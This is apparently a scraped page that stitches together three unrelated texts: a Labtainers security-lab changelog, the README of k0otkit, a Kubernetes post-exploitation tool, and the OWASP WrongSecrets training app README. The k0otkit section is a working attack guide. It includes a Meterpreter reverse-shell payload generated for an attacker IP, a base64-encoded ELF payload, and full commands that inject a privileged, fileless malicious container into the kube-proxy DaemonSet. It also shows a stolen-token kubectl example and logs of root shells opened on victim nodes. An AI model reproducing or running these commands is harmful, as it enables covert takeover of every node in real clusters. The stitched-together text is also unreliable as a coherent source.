November 14, 2018

  • Remove /run/nologin from archive machine in backups2 -- need general solution for this nologin issue

November 5, 2018

  • Change file-integrity lab default aid.conf to track metadata changes rather than file modification times

October 22, 2018

  • macs-hash lab resolution of verydodgy.com failed on lab restart
  • Notify function failed if notify_cb.sh is missing

October 12, 2018

  • Set ulimit on file size, limit to 1G

October 10, 2018

  • Force collection of parameterized files
  • Explicitly include leafpad and ghex in centos-xtra baseline and rebuild dependent images.

September 28, 2018

  • Fix access modes of shared file in ACL lab
  • Clarify question in pass-crack
  • Modify artifact collection to ignore files older than start of lab.
  • Add quantum computing algorithms lab

September 12, 2018

  • Fix setuid-env grading syntax errors
  • Fix syntax error in iptables2 example firewall rules
  • Rebuild centos labs, move lamp derivatives to use lamp.xtr for waitparam and force httpd to wait for that to finish.

September 7, 2018

  • Add CyberCIEGE as a lab
  • Display read_pre.txt information prior to pulling images, with a chance to bail.

September 5, 2018

  • Restore sakai bulk download processing to gradelab function.
  • Remove unused instructor scripts.

September 4, 2018

  • Allow multiple IP addresses per network interface
  • Add base image for Wine
  • Add GRFICS virtual ICS simulation

August 23, 2018

  • Add GrassMarlin lab (ICS network discovery)

August 21, 2018

  • Another fix around AWS authentication issues (DockerHub uses AWS).
  • Fix new_lab_setup.py to use git instead of svn.
  • Split plc-forensics lab into a basic lab and an advanced lab (plc-forensics-adv)

August 17, 2018

  • Transition to git & GitHub as authoritative repo.

August 15, 2018

  • Modify plc-forensics lab assessment to be more general; revise lab manual to reflect wireshark on the Labtainer.
  • Add "checkwork" command allowing students to view automated assessment results for their lab work.
  • Include logging of iptables packet drops in the iptables2 and the iptables-ics lab.
  • Remove obsolete instances of is_true and is_false from goal.config
  • Fix boolean evaluation to handle "NOT foo", it had expected more operands.

August 9, 2018

  • Support parameter replacement in results.config files
  • Add TIME_DELIM result type for results.config
  • Rework the iptables lab, remove hidden nmap commands, introduce custom service

August 7, 2018

  • Add link to student guide in labtainer-student directory
  • Add link to student guide on VM desktops
  • Fixes to iptables-ics to avoid long delay on shutdown; and fixes to regression tests
  • Add note to guides suggesting student use of VM browser to transfer artifact zip file to instructor.

August 1, 2018

  • Use a generic Docker image for automated assessment; stop creating "instructor" images per lab.

July 30, 2018

  • Document need to unblock the waitparam.service (by creating flag directory) if a fixlocal.sh script is to start a service for which waitparam is a prerequisite.
  • Add plc-app lab for PLC application firewall and whitelisting exercise.

July 25, 2018

  • Add string_contains operator to goals processing
  • Modify assessment of formatstring lab to account for leaked secret not always being at the end of the displayed string.

July 24, 2018

  • Add SSH Agent lab (ssh-agent)

July 20, 2018

  • Support offline building, optionally skip all image pulling
  • Restore apt/yum repo restoration to Dockerfile templates.
  • Handle redirect URL's from Docker registry blob retrieval to avoid authentication errors (Do not rely on curl --location).

July 12, 2018

  • Add prestop feature to allow execution of designer-specified scripts on selected components prior to lab shutdown.
  • Correct host naming in the ssl lab, it was breaking automated assessment.
  • Fix dmz-lab initial state to permit DNS resolutions from inner network.
  • FILE_REGEX processing was not properly handling multiline searches.
  • Framework version derived from newly rebuilt images had incorrect default value.

July 10, 2018

  • Add an LDAP lab
  • Complete transition to systemd based Ubuntu images, remove unused files
  • Move lab_sys tar file to per-container tmp directory for concurrency.

July 6, 2018

  • All Ubuntu base images replaced with versions based on systemd
  • Labtainer container images in registry now tagged with base image ID & have labels reflecting the base image.
  • A given installation will pull and use images that are consistent with the base images it possesses.
  • If you are using a VM image, you may want to replace that with a newer VM image from our website.
  • New labs will not run without downloading newer base images; which can lead to your VM storing multiple versions of large base images (> 500 MB each).
  • Was losing artifacts from processes that were running when lab was stopped -- was not properly killing capinout processes.

June 27, 2018

  • Add support for Ubuntu systemd images
  • Remove old copy of SimLab.py from labtainer-student/bin
  • Move apt and yum sources to /var/tmp
  • Clarify differences between use of "boolean" and "count_greater" in assessments
  • Extend Add-HOST in start.config to include all components on a network.
  • Add option to new_lab_setup.py to add a container based on a copy of an existing container.

June 21, 2018

  • Set DISPLAY env for root
  • Fix to build dependency handling of svn status output
  • Add radius lab
  • Bug in SimLab append corrected
  • Use svn, where appropriate, to change file names with new_lab_setup.py

June 19, 2018

  • Retain order of containers defined in start.conf when creating terminal with multiple tabs
  • Clarify designer manual to identify path to assessment configuration files.
  • Remove prompt for instructor to provide email
  • Botched error checking when testing for version number
  • Include timestamps of lab starts and redos in the assessment json
  • Add an SSL lab that includes bi-directional authentication and creation of certificates.

June 15, 2018

  • Convert plain text instructions that appeared in xterms into a pdf file.
  • Fix bug in version handling of images that have not yet been pulled.
  • Detect the occurrence of a container that was created but not parameterized, and prompt the user to restart the lab with the "-r" option.
  • Add designer utility rm_svn.py so that removed files trigger an image rebuild.

June 14, 2018

  • Add diagnostics to parameterizing, to track down why some installs seem to fail on that.
  • If a container is already created, make sure it is parameterized; otherwise bail, to avoid corrupt or half-baked containers.
  • Fix program version number to use svn HEAD

June 13, 2018

  • Install xterm on Ubuntu 18 systems
  • Work around breakage in new versions of gnome-terminal tab handling

June 11, 2018

  • Add version checking to compare images to the framework.
  • Clarify various lab manuals

June 2, 2018

  • When installing on Ubuntu 18, use docker.io instead of docker-ce
  • The capinout caused a crash when a "sudo su" monitored command is followed by a non-elevated user command.
  • Move routing and resolv.conf settings into /etc/rc.local instead of fixlocal.sh so they persist across start/stop of the containers.

May 31, 2018

  • Work around Docker bug that caused text to wrap in a terminal without a line feed.
  • Extend COMMAND_COUNT to account for pipes
  • Create new version of backups lab that includes backups to a remote server and backs up an entire partition.
  • Alter sshlab instructions to use ssh-copy-id utility
  • Delete /run/nologin file from parameterize.sh to permit ssh login on CentOS

May 30, 2018

  • Extended new_lab_setup.py to permit identification of the base image to use
  • Create new version of centos-log that includes centralized logging.
  • Assessment validation was not accepting "time_not_during" option.
  • Begin to integrate Labtainer Master for managing Labtainers from a Docker container.

May 25, 2018

  • Remove 10 second sleeps from various services. Was delaying xinetd responses, breaking automated tests.
  • Fix snort lab grading to only require "CONFIDENTIAL" in the alarm. Remove unused files from lab.
  • Program finish times were not recorded if the program was running when the lab was stopped.

May 21, 2018

  • Fix retlibc grading to remove duplicate goal, was failing automated assessment
  • Remove copies of mynotify.py from individual labs and the lab template; it has been part of lab_sys/sbin, but had not been updated to reflect fixes made for the acl lab.

May 18, 2018

  • Mask signal message from exec_wrap so that segv error message looks right.
  • The capinout was sometimes losing stdout, check command stdout on death of cmd.
  • Fix grading of formatstring to catch segmentation fault message.
  • Add type_function feature to SimLab to type stdout of a script (see formatstring simlab).
  • Remove SimLab limitation on combining single/double quotes.
  • Add window_wait directive to SimLab to pause until window with given title can be found.
  • Modify plc lab to alter titles on physical world terminal to reflect status, this also makes testing easier.
  • Fix bufoverflow lab manual link.

May 15, 2018

  • Add appendix on use of the SimLab tool to simulate user performance of labs for regression testing and lab development.
  • Add wait_net function to SimLab to pause until selected network connections terminate.
  • Change acl automated assessment to use FILE_REGEX for multiline matching.
  • SimLab test for xsite lab.

May 11, 2018

  • Add "noskip" file to force collection of files otherwise found in home.tar, needed for retrieving Firefox places.sqlite.
  • Merge sqlite database with write ahead buffer before extracting.
  • Corrections to lab manual for the symkeylab
  • Grading additions for symkeylab and pubkey
  • Improvements to simlab tool: support include, fix window naming.

May 9, 2018

  • Fix parameterization of the file-deletion lab. Correct error its lab manual.
  • Replace use of shell=True in python scripts to reduce processes and allow tracking PIDs
  • Clean up manuals for backups, pass-crack and macs-hash.

May 8, 2018

  • Handle race condition to prevent gnome-terminal from executing its docker command before an xterm instruction terminal runs its command.
  • Don't display errors when instructor stops a lab started with "-d".
  • Change grading of nmap-ssh to better reflect intent of the lab.
  • Several document and script fixes suggested by olberger on github.

May 7, 2018

  • Use C-based capinout program instead of the old capinout.sh to capture stdin and stdout. See trunk/src-tool/capinout. Removes limitations associated with use of ctrl-C to break monitored programs and the display of passwords in telnet and ssh.
  • Include support for sakai bulk_download zip processing to extract separately submitted reports, and summarize missing submits.
  • Add checks to user-provided email to ensure they are printable characters.
  • While grading, if the user-supplied email does not match the zip file name, proceed to grade the results, but include a note in the table reflecting possible cheating. Required to recover from cases where a student enters garbage for an email address.
  • Change telnetlab grading to not look at tcpdump output for passwords -- capinout fix leads to correct character-at-a-time transmission to server.
  • Fix typo in install-docker.sh and use sudo to alter docker dns setting in that script.

April 26, 2018

  • Transition to use of "labtainer" to start lab, and "stoplab" to stop it.
  • Add --version option to labtainer command.
  • Add log_ts and log_range result types, and time_not_during goal operators. Revamp the centos-log and sys-log grading to use these features.
  • Put labsys.tar into /var/tmp instead of /tmp, sometimes would get deleted before expanded
  • Running X applications as root fails after reboot of VM.
  • Add "User Command" man pages to CentOS based labs
  • Fix recent bug that prevented collection of docs files from students
  • Modify smoke-tests to only compare student-specific result line, void of whitespace

April 20, 2018

  • The denyhosts service fails to start the first time, moved start to student_startup.sh.
  • Move all faux_init services until after parameterization -- rsyslog was failing to start on second boot of container.

April 19, 2018

  • The acl lab failed to properly assess performance of the trojan horse step.
  • Collect student documents by default.
  • The denyhost lab changed to reflect that denyhosts (or tcp wrappers?) now modifies iptables. Also, the denyhosts service was failing to start on some occasions.
  • When updating Labtainers, do not overwrite files that are newer than those in the archive -- preserve student lab reports.

April 12, 2018

  • Add documentation for the purpose of lab goals, and display this for the instructor when the instructor starts a lab.
  • Correct use of the precheck function when the program is in treataslocal; pass capinout.sh the full program path.
  • Copy instr_config files at run time rather than during image build.
  • Add Designer Guide section on debugging automated assessment.
  • Incorrect case in lab report file names.
  • Unnecessary chown function caused instructor.py to sometimes crash.
  • Support for automated testing of labs (see SimLab and smoketest).
  • Move testsets and distrib under trunk

April 5, 2018

  • Revise Firefox profile to remove the "you've not used Firefox in a while..." message.
  • Remove unnecessary pulls from registry -- get image dates via docker hub API instead.

March 28, 2018

  • Use explicit tar instead of "docker cp" for system files (Docker does not follow links.)
  • Fix backups lab to use a separate file system and update the manual.

March 26, 2018

  • Support for multi-user modes (see Lab Designer User Guide).
  • Removed build dependency on the lab_bin and lab_sys files. Those are now copied during parameterization of the lab.
  • Move capinout.sh to /sbin so it can be found when running as root.

March 21, 2018

  • Add CLONE to permit multiple instances of the same container, e.g., for labs shared by multiple concurrent students.
  • Adapt kali-test lab to provide example of macvlan and CLONE
  • Copy the capinout.sh script to /sbin so root can find it after a sudo su.

March 15, 2018

  • Support macvlan networks for communications with external hosts
  • Add a Kali linux base, and a Metasploitable 2 image (see kali-test)

March 8, 2018

  • Do not require labname when using stop.py
  • Catch errors caused by stray networks and advise user on a fix
  • Add support for use of local apt & yum repos at NPS

February 21, 2018

  • Add dmz-lab
  • Change "checklocal" to "precheck", reflecting it runs prior to the command.
  • Decouple inotify event reporting from use of precheck.sh, allow inotify event lists to include optional outputfile name.
  • Extend bash hook to root operations, flush that bash_history.
  • Allow parameterization of start.config fields, e.g., for random IP addresses
  • Support monitoring of services started via systemctl or /etc/init.d
  • Introduce time delimiter qualifiers to organize a timestamped log file into ranges delimited by some configuration change of interest (see dmz-lab)

February 5, 2018

  • Boolean values from results.config files are now treated as goal values
  • Add regular expression support for identifying artifact results.
  • Support for alternate Docker registries, including a local test registry for testing
  • Misc fixes to labs and lab manuals
  • The capinout monitoring hook was not killing child processes on exit.
  • Kill monitored processes before collecting artifacts
  • Add labtainer.wireshark as a baseline container, clean up dockerfiles

January 30, 2018

  • Add snort lab
  • Integrate log file timestamps, e.g., from syslogs, into timestamped results.
  • Remove undefined result values from intermediate timestamped json result files.
  • Alter the time_during goal assessment operation to associate timestamps with the resulting goal value.

January 24, 2018

  • Use of tabbed windows caused the instructor side to fail due to use of double quotes.
  • Ignore files in _tar directories (other than .tar) when determining build dependencies.


K0Otkit - Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters


k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell).

k0otkit is the combination of Kubernetes and rootkit.

Prerequisite:

k0otkit is a post-penetration tool, so you first have to compromise a cluster, somehow manage to escape from the container, and get root privilege on the master node (to be exact, you should get the admin privilege of the target Kubernetes).

Scenario:

  1. After Web penetration, you get a shell of the target.
  2. If necessary, you manage to escalate privileges.
  3. You find the target environment is a container (Pod) in a Kubernetes cluster.
  4. You manage to escape from the container (with CVE-2016-5195, CVE-2019-5736, docker.sock or other techniques).
  5. You get a root shell of the master node and are able to instruct the cluster with kubectl on the master node as admin.
  6. Now you want to control all the nodes in the cluster as quickly as possible. Here comes k0otkit!

k0otkit is detailed in k0otkit: Hack K8s in a K8s Way.


Usage

Make sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the kubectl command in k0otkit_template.sh to use the token or certificate.)
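
For instance, a hedged sketch of pointing kubectl at the API server with a stolen service-account token instead of the admin kubeconfig (the server address and token are placeholders):

kubectl --server=https://<apiserver>:6443 \
        --token="$STOLEN_SA_TOKEN" \
        --insecure-skip-tls-verify \
        -n kube-system get daemonsets kube-proxy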

Make sure you have installed Metasploit on your attacker host (msfvenom and msfconsole should be available).

Deploy k0otkit

Clone this repository:

git clone https://github.com/brant-ruan/k0otkit
cd k0otkit/
chmod +x ./*.sh

Replace the attacker's IP and port in pre_exp.sh with your own IP and port:

ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444

Generate k0otkit:

./pre_exp.sh

k0otkit.sh will be generated. Then run the reverse shell handler:

./handle_multi_reverse_shell.sh

Once the handler is ready, copy the content of k0otkit.sh and paste it into your shell on the master node of the target Kubernetes, then press <Enter> to execute it.

Wait a moment and enjoy reverse shells from all nodes :)

P.S. There is no limit to how many Kubernetes clusters you can manipulate with k0otkit.
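
To confirm the injection took effect, something like the following can be run on the master node (a hypothetical check; the container name matches the ctr_name used in the example below):

# the malicious sidecar should now appear in the kube-proxy DaemonSet spec
kubectl -n kube-system get daemonset kube-proxy -o yaml | grep -A 3 "name: kube-proxy-cache"
# and the kube-proxy pods should be restarting across all nodes
kubectl -n kube-system get pods -l k8s-app=kube-proxy -o wide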

Interact with Shells

After the successful deployment of k0otkit, you can interact with any reverse shell as you want:

# within msfconsole
sessions 1

Features

  • utilize K8s resources and features (hack K8s in a K8s way)
  • dynamic container injection
  • communication encryption (thanks to Meterpreter)
  • fileless

Example

Generate k0otkit:

kali@kali:~/k0otkit$ ./pre_exp.sh
+ ATTACKER_IP=192.168.1.107
+ ATTACKER_PORT=4444
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d '\n'
++ base64 -w 0
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh

Run the reverse shell handler:

kali@kali:~/k0otkit$ ./handle_multi_reverse_shell.sh
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 exploit(multi/handler) >

Copy the content of k0otkit.sh into your shell on the master node of the target Kubernetes and press <Enter>:

kali@kali:~$ nc -lvnp 10000
listening on [any] 10000 ...
connect to [192.168.1.107] from (UNKNOWN) [192.168.1.106] 48750
root@victim-2:~# volume_name=cache
root@victim-2:~# mount_path=/var/kube-proxy-cache
root@victim-2:~# ctr_name=kube-proxy-cache
root@victim-2:~# binary_file=/usr/local/bin/kube-proxy-cache
root@victim-2:~# payload_name=cache
root@victim-2:~# secret_name=proxy-cache
root@victim-2:~# secret_data_name=content
root@victim-2:~# ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
root@victim-2:~# volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
root@victim-2:~# image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
root@victim-2:~# # create payload secret
root@victim-2:~# cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
> apiVersion: v1
> kind: Secret
> metadata:
>   name: $secret_name
>   namespace: kube-system
> type: Opaque
> data:
>   $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
> EOF
secret/proxy-cache created
root@victim-2:~# # assume that ctr_line_num < volume_line_num
root@victim-2:~# # otherwise you should switch the two sed commands below
root@victim-2:~# # inject malicious container into kube-proxy pod
root@victim-2:~# kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
> | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n hostPath:\n path: /\n type: Directory\n" \
> | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n image: $image\n imagePullPolicy: IfNotPresent\n command: [\"sh\"]\n args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n env:\n - name: $payload_name\n valueFrom:\n secretKeyRef:\n name: $secret_name\n key: $secret_data_name\n securityContext:\n privileged: true\n volumeMounts:\n - mountPath: $mount_path\n name: $volume_name" \
> | kubectl replace -f -
daemonset.extensions/kube-proxy replaced

Wait for reverse shells:

msf5 exploit(multi/handler) > [*] Sending stage (985320 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.107:4444 -> 192.168.1.106:51610) at 2020-11-30 03:30:18 -0500

msf5 exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.168.1.106 192.168.1.107:4444 -> 192.168.1.106:51610 (192.168.1.106)

Function 1 Exit & Re-connect:

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9 created.
Channel 1 created.
whoami
root
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.106 - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/handler) >
[*] Sending stage (985320 bytes) to 192.168.1.106
[*] Meterpreter session 2 opened (192.168.1.107:4444 -> 192.168.1.106:52292) at 2020-11-30 03:32:25 -0500

Function 2 Escape to & Control Node:

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > cd /var/kube-proxy-cache
meterpreter > ls
Listing: /var/kube-proxy-cache
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-03-03 03:21:08 -0500 bin
40755/rwxr-xr-x 4096 dir 2020-03-05 22:23:56 -0500 boot
40755/rwxr-xr-x 4180 dir 2020-04-09 21:32:10 -0400 dev
40755/rwxr-xr-x 4096 dir 2020-04-17 02:31:15 -0400 etc
40755/rwxr-xr-x 4096 dir 2020-03-03 03:00:00 -0500 home
100644/rw-r--r-- 36257923 fil 2020-03-05 22:23:56 -0500 initrd.img
100644/rw-r--r-- 39829184 fil 2020-03-03 03:00:17 -0500 initrd.img.old
40755/rwxr-xr-x 4096 dir 2020-04-16 03:52:46 -0400 lib
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 lib64
40700/rwx------ 16384 dir 2020-03-03 02:33:19 -0500 lost+found
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:29 -0500 media
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 mnt
40755/rwxr-xr-x 4096 dir 2020-04-16 03:59:01 -0400 opt
40555/r-xr-xr-x 0 dir 2020-04-09 21:32:01 -0400 proc
40700/rwx------ 4096 dir 2020-11-30 04:00:05 -0500 root
40755/rwxr-xr-x 1020 dir 2020-11-30 04:04:59 -0500 run
40755/rwxr-xr-x 12288 dir 2020-04-16 03:52:46 -0400 sbin
40755/rwxr-xr-x 4096 dir 2020-03-03 03:02:37 -0500 snap
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 srv
40555/r-xr-xr-x 0 dir 2020-04-14 22:51:06 -0400 sys
41777/rwxrwxrwx 4096 dir 2020-11-30 04:10:07 -0500 tmp
40755/rwxr-xr-x 4096 dir 2020-04-16 04:42:54 -0400 usr
40755/rwxr-xr-x 4096 dir 2020-03-03 02:5 1:25 -0500 var
100600/rw------- 6712336 fil 2020-03-05 22:22:58 -0500 vmlinuz
100600/rw------- 7184032 fil 2020-03-03 02:33:55 -0500 vmlinuz.old


Wrongsecrets - Examples With How To Not Use Secrets


Welcome to the OWASP WrongSecrets p0wnable app. With this app, we have packed various ways of how to not store your secrets. These can help you to realize whether your secret management is ok. The challenge is to find all the different secrets by means of various tools and techniques.

Can you solve all 16 challenges?


Support

Need support? Contact us via OWASP Slack, for which you sign up here, file a PR, file an issue, or use discussions. Please note that this is an OWASP volunteer-based project, so it might take a little while before we respond.

Basic docker exercises

Can be used for challenges 1-4, 8, 12-15

For the basic Docker exercises you currently require Docker to be installed. You can run the app by doing:

docker run -p 8080:8080 jeroenwillemsen/wrongsecrets:1.4.0-no-vault

Now you can try to find the secrets by solving the challenges offered at http://localhost:8080.

Note that these challenges are still very basic, and so are their explanations. Feel free to file a PR to make them look better ;-).

Running these on Heroku

You can test them out at https://wrongsecrets.herokuapp.com/ as well! But please understand that we make NO guarantees that this works. Given that we run on the Heroku free tier, please do not fuzz it and/or try to bring it down: you would be spoiling it for others who want to test-drive it.

Deploying the app under your own heroku account

  1. Sign up to Heroku and log in to your account
  2. Click the button below and follow the instructions

Basic K8s exercise

Can be used for challenges 1-6, 8, 12-16

Minikube based

Make sure you have Minikube and kubectl installed.

The K8s setup currently is based on using Minikube for local fun:

minikube start
kubectl apply -f k8s/secrets-config.yml
kubectl apply -f k8s/secrets-secret.yml
kubectl apply -f k8s/secret-challenge-deployment.yml
while [[ $(kubectl get pods -l app=secret-challenge -o 'jsonpath={..status.conditions[?(@.type=="Ready")].status}') != "True" ]]; do echo "waiting for secret-challenge" && sleep 2; done
kubectl expose deployment secret-challenge --type=LoadBalancer --port=8080
minikube service secret-challenge

Now you can use the provided IP address and port to further play with the K8s variant (instead of localhost).

k8s based

Want to run vanilla on your own k8s? Use the commands below:

kubectl apply -f k8s/secrets-config.yml
kubectl apply -f k8s/secrets-secret.yml
kubectl apply -f k8s/secret-challenge-deployment.yml
while [[ $(kubectl get pods -l app=secret-challenge -o 'jsonpath={..status.conditions[?(@.type=="Ready")].status}') != "True" ]]; do echo "waiting for secret-challenge" && sleep 2; done
kubectl port-forward \
$(kubectl get pod -l app=secret-challenge -o jsonpath="{.items[0].metadata.name}") \
8080:8080

Now you can use the provided IP address and port to further play with the K8s variant (instead of localhost).

Vault exercises with minikube

Can be used for challenges 1-8, 12-16.

Make sure you have the following installed:

Run ./k8s-vault-minkube-start.sh; when the script is done, the challenges will wait for you at http://localhost:8080. This will allow you to run challenges 1-8, 12-15.

When you have stopped the k8s-vault-minikube-start.sh script and want to resume the port forward, run k8s-vault-minikube-resume.sh. This is because, if you run the start script again, it will replace the secret in the vault but not update the secret-challenge application with the new secret.

Cloud Challenges

Can be used for challenges 1-16

READ THIS: Given that the exercises below contain IAM privilege escalation exercises, never run this on an account which is related to your production environment or can influence your account-overarching resources.

Running WrongSecrets in AWS

Follow the steps in the README in the AWS subfolder.

Running WrongSecrets in GCP

Follow the steps in the README in the GCP subfolder.

Running WrongSecrets in Azure

Follow the steps in the README in the Azure subfolder.

Running Challenge15 in your own cloud only

When you want to include your own Canarytokens for your cloud-deployment, do the following:

  1. Fork the project.
  2. Make sure you use the GCP ingress or AWS ingress scripts to generate an ingress for your project.
  3. Go to canarytokens.org and select AWS Keys, in the webHook URL field add <your-domain-created-at-step1>/canaries/tokencallback.
  4. Encrypt the received credentials so that Challenge15 can decrypt them again.
  5. Commit the unencrypted and encrypted materials to Git and then commit again without the decrypted materials.
  6. Adapt the hints of Challenge 15 in your fork to point to your fork.
  7. Create a container and push it to your registry
  8. Override the K8s definition files for either AWS or GCP.

Do you want to play without guidance?

Each challenge has a Show hints button and a What's wrong? button. These buttons help to simplify the challenges and give explanations to the reader. However, the explanations can spoil the fun if you want to do this as a hacking exercise. Therefore, you can disable them by overriding the following settings in your env:

  • hints_enabled=false will turn off the Show hints button.
  • reason_enabled=false will turn off the What's wrong? explanation button.
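
For example, with the Docker variant shown earlier, both buttons can be disabled at startup (a sketch reusing the same image tag):

docker run -p 8080:8080 \
  -e hints_enabled=false \
  -e reason_enabled=false \
  jeroenwillemsen/wrongsecrets:1.4.0-no-vault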

Special thanks & Contributors

Leaders:

Top contributors:

Testers:

Special mentions for helping out:

Help Wanted

You can help us by the following methods:

  • Star us
  • Share this app with others
  • Of course, we can always use your help to get more flavors of "wrongly" configured secrets in, to spread awareness! We would love to get some help with other cloud providers, like Alibaba or Tencent Cloud, for instance. Do you miss something other than a cloud provider as an example? File an issue or create a PR! See our guide on contributing for more details. Contributors will be listed in releases, in the "Special thanks & Contributors" section, and in the web app.

Use OWASP WrongSecrets as a secret detection benchmark

As tons of secret detection tools are coming up for both Docker and Git, we are creating a benchmark testbed for them. Want to know if your tool detects everything? We keep track of the embedded secrets in this issue and have a branch in which we put additional secrets for your tool to detect. The branch will contain a Docker container generation script with which you can eventually test your container secret scanning.

Notes on development

For development on a local machine, use the local profile: ./mvnw spring-boot:run -Dspring-boot.run.profiles=local

If you want to test against vault without K8s: start vault locally with

 export VAULT_ADDR='http://127.0.0.1:8200'
export VAULT_API_ADDR='http://127.0.0.1:8200'
vault server -dev

and in your next terminal, do (with the token from the previous commands):

export VAULT_ADDR='http://127.0.0.1:8200'
export VAULT_TOKEN='<TOKENHERE>'
vault token create -id="00000000-0000-0000-0000-000000000000" -policy="root"
vault kv put secret/secret-challenge vaultpassword.password="$(openssl rand -base64 16)"

Now use the local-vault profile to do your development.

./mvnw spring-boot:run -Dspring-boot.run.profiles=local,local-vault

If you want to dev without a Vault instance, use additionally the without-vault profile to do your development:

./mvnw spring-boot:run -Dspring-boot.run.profiles=local,without-vault

Want to push a container? See .github/scripts/docker-create-and-push.sh for a script that generates and pushes all containers. Do not forget to rebuild the app before composing the container.

Dependency management

